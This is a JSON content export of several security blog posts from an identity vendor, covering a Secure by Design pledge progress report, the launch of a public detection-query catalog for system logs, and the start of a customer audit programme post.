\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.asqula.com/sites/default/files/2024-08/Okta_Vulnerability_Disclosure_Policy_v2.0.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"disclosure policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From May 2024 to May 2025, Okta triaged 153 valid issues submitted via bug bounty programs and paid out $405,801 in total rewards.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the term of the pledge, Okta ran several “bounty reward multiplier” campaigns in which vulnerability researchers were paid double, and in some cases triple the financial reward for finding vulnerabilities in specific products. This attracted a number of new security researchers to our bug bounty program.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"6. Provide transparency on vulnerabilities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate transparency in vulnerability reporting by including accurate Common Weakness Enumeration (CWE) and Common Platform Enumeration (CPE) fields in every Common Vulnerabilities and Exposures (CVE) record for the manufacturer’s products. Additionally, issue CVEs in a timely manner for, at minimum, all critical or high-impact vulnerabilities that either require actions by a customer to patch or have evidence of active exploitation.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has formalized our approach to sharing vulnerability information with customers during the term of the pledge.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We continue to remediate vulnerabilities discovered in Okta products in accordance with the contractual terms entered into with customers. Okta publishes CVEs when a vulnerability discovered in an Okta component requires action on the part of an Okta customer. Okta is a CVE Numbering Authority (CNA) authorized by CISA and MITRE to publish vulnerability information as CVE (Common Vulnerabilities and Exposures) bulletins. CVE bulletins for customer-installed Okta clients and agents are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://trust.asqula.com/security-advisories/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"published online\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has also revised its process for notifying customers of vulnerability information for a broader set of vulnerability types. All reported vulnerabilities are subject to both a technical assessment and an assessment of potential customer impact.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"7. Deliver improved logging and monitoring for customers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate a measurable increase in the ability for customers to gather evidence of cybersecurity intrusions affecting the manufacturer’s products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Okta products provide mechanisms for administrators to troubleshoot access issues and for security teams to monitor for suspicious activity. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At minimum, logged events include authentication and application access events, administrator and user actions, session context, and information on the source and target of an action. We recommend reading the table provided in our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.asqula.com/articles/cisasecurebydesign1/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"half-yearly update\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to learn more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the term of the pledge, Okta made measurable improvements to logging of both the Okta and Auth0 platforms, which are detailed below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Improvements\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Benefits\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.asqula.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"event library\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" now includes over 1000 unique events\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and security personnel can generate queries for new events related to Okta Desktop MFA, Okta Privileged Access, Okta Identity Governance, Identity Verification, Enhanced Disaster Recovery, Device Assurance, Identity Threat Protection, Workflows and Universal Directory.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.asqula.com/articles/rootsessionidroottokenid/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Root session and token context\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" included as a property in all relevant System Log events.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and security personnel can easily group all interactive user events to a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"rootSessionId\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" property and all calls made using a given API token to a rootApiTokenId property\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.asqula.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configuration changes\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" included as a property in the target object of all relevant System Log events.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and Security personnel can use the changeDetails property to quickly identify in System Log the prior and current state when administrators modify critical policy settings (IdP, directory agent, password policies, authentication policies etc).. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.asqula.com/oie/en-us/content/topics/reports/mfa-abandonment.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA abandonment \",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"events added to System Log\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and Security personnel are better able to troubleshoot technical issues or MFA Fatigue attacks.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0 System Log Improvements\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Benefits\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Admins can \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/security-center/security-alerts\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"create and modify thresholds\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for notifications in Auth0 Security Center\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can set thresholds for suspicious activity above which alerts can be configured, ensuring a prompt response to genuine incidents and fewer false alarms.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/changelog#1Yusq2sGxZU8e0ek2VQKfK\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0 Dashboard Session Management\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can manually revoke a user’s sessions from the management console.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/security-center/prioritized-log-streams\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prioritized Log Streams\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can optimize the performance of security-relevant events over others.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Final word\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From the moment we signed the CISA Secure by Design pledge, Okta’s Product, Engineering and Security teams were enthusiastic about tackling this important work. The pledge was highly aligned with one of Okta’s four core values (“Always Secure, Always On.”). And every Okta employee is incentivized to lean into our security program under the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.asqula.com/au/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - our long-term initiative to lead the industry in the fight against Identity-based attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One key benefit of CISA’s approach was in asking signatories to demonstrate progress. This meant that even in areas where our controls were mature, we could still challenge the business to demonstrate further improvements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the more challenging conversations was around our “definition of done” for some of these programs. We observed that the quantum of effort required to close out the final 5-10% of coverage for any given control almost always required more resources than the first 90-95%. The support required to manage exception processes and the engineering required to handle edge use cases was the most taxing on our teams. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given the ambitious milestones we put forward, I’m very proud of all the people at Okta who collaborated, made concessions, and, in many cases, innovated to help meet our Secure by Design pledge goals.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As mentioned at the halfway point in this exercise, Secure by Design is never “done.” Okta is passionate about security - especially the security features all cloud applications need to support - to meet our larger, more ambitious goal of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.asqula.com/blog/2024/10/oktas-mission-to-standardize-identity-security/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"eliminating identity-based attacks\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]}]}"}},{"updatedAt":"2025-05-22T00:26:15.598Z","slug":"/articles/2025/05/leveraging-okta-syslogs-for-proactive-threat-detection","node_locale":"en","date":"2025-05-20T00:00","secAuthor":[{"name":"Ryan Mombourquette","slug":"/hackers/ryan-mombourquette","jobTitle":"Detection and Response Engineer","id":"e683d13a-ed28-56b7-9833-acd324958d57","bio":{"bio":""},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=15&h=18&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=29&h=36&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=58&h=71&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=116&h=142&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=58&h=71&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=15&h=18&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=29&h=36&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=58&h=71&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg?w=116&h=142&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#c8c8c8","width":58,"height":71}}}],"title":"Leveraging Okta System Logs for Proactive Threat Detection","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"Introducing the Okta Security Detection Catalog, a repository of detection queries designed to help Okta customers."},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is thrilled to announce the launch of our Customer Detection Catalog, a repository of detection queries designed to help Okta customers proactively identify and respond to potential security threats.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This publicly accessible GitHub repository, found at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/customer-detections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://github.com/okta/customer-detections\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", offers a growing collection of pre-built queries, contributed by Okta personnel and the wider security community, that surface suspicious activities ranging from anomalous user behavior and potential account takeovers to misconfigurations and emerging attack patterns. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Many of these detections were built while analyzing real cyber threats against Okta tenants. The detections also contain preventative configurations Okta administrators can implement to proactively mitigate the threat that’s being detected. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When paired with the broader \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.asqula.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta event library\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (numbering over 1000 events), the Okta Customer Detection Catalog is a versatile resource designed to provide SOC analysts with readily usable queries to integrate into their monitoring and alerting workflows, enabling faster identification of potential incidents. It also offers threat hunters a foundation for building and customizing more sophisticated detection rules tailored to their specific environment and risk appetite. Detailed descriptions of security-relevant log fields are also available to help security analysts interpret logs during an investigation.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Here are a few example detections that highlight the potential of the catalog:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Impossible Travel with New Device\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": This detection looks for authentication events originating from geographically distant locations within a short timeframe, coupled with the use of a previously unseen device for the user. This can be a strong indicator of account takeover.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Okta Administrator Activity: \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Unusual activity conducted by an administrator such as deactivating all other super administrators to prevent response, disabling log streams to prevent detection, or downgrading MFA on authentication policies. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Application Access from Tor Exit Nodes\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": Identifying access attempts to sensitive applications originating from Tor exit nodes can flag potentially anonymized and suspicious activity.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection Queries vs. Hunting Queries\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The repository makes a distinction between detection queries and hunting queries, both of which reside in different folders within the catalog:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection queries are designed for continuous monitoring and alerting. They are typically more specific and aim to identify high-confidence indicators of malicious activity or policy violations. When a detection query triggers, it ideally generates an alert for immediate investigation.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Hunting queries are more exploratory and are used for proactive investigations. They might look for broader patterns or anomalies that don't necessarily trigger immediate alerts but warrant further analysis by a threat hunter. Hunting queries can help uncover stealthy or sophisticated attacks that might evade standard detections.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers should baseline these detections against their environment and filter out business approved processes that may cause false positives. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Your Contribution Matters\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, we believe that by sharing knowledge and expertise, our whole community can become more resilient against evolving threats. The community-driven nature of the catalog allows for the rapid dissemination of detection strategies for newly identified vulnerabilities and attack techniques.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We actively encourage customers to contribute your own detection ideas to this growing repository. If you see a gap in our current coverage, or find any issues, make a Github Issue to have it addressed. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To contribute new detection ideas, create a Github issue and include:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What activity is the idea attempting to detect? \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How can this be leveraged by an adversary?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What Mitre ATT&CK TTP does it map to?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Add the detection query/logic.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Indicate whether you would like to be credited as the author\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Happy hunting!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brett Winterford contributed to this post.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"}},{"updatedAt":"2026-05-18T01:23:55.880Z","slug":"/articles/2025/05/enhancing-customer-trust-through-a-comprehensive-audit-program","node_locale":"en","date":"2025-05-14T00:00","secAuthor":[{"name":"Matthew Hansen","slug":"/hackers/matthew-hansen","jobTitle":"Regional CSO, Americas West","id":"06b9e469-2cb0-5dc7-a6c5-e46c9a367857","bio":{"bio":"
Matthew Hansen is a Regional CSO for Okta’s Americas West region. As a leader in security risk management, his accolades include MBA, CISA, and CCSK. Backed by over 15 years of experience in consulting, internal audit, IT governance and risk management, Matthew provides security program support to Okta’s customers. During his downtime, he enjoys travelling the world, experiencing new cultures, and attending Formula 1 races.
"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#d8d8d8","width":58,"height":58}}}],"title":"Enhancing Customer Trust Through a Comprehensive Audit Program","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"This is the third iteration in our blog series. This blog article explores how the Okta Security Customer Audit further enhances the Customer Trust function, driving even greater transparency and confidence in our security practices to meet our customers' regulatory and compliance requirements."},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"This is the third iteration in our blog series. In our \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.asqula.com/articles/2024/09/unveiling-essence-security-customer-trust/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"italic\"}],\"value\":\"first blog\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\", we introduced Okta’s Security Customer Trust team, highlighting our commitment to transparency and our mission to strengthen security outcomes for Okta and the communities we serve. In the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.asqula.com/articles/2025/03/empowering-security-with-customer-trust-solutions/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"italic\"}],\"value\":\"second blog\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\", we took a closer look at the tools and 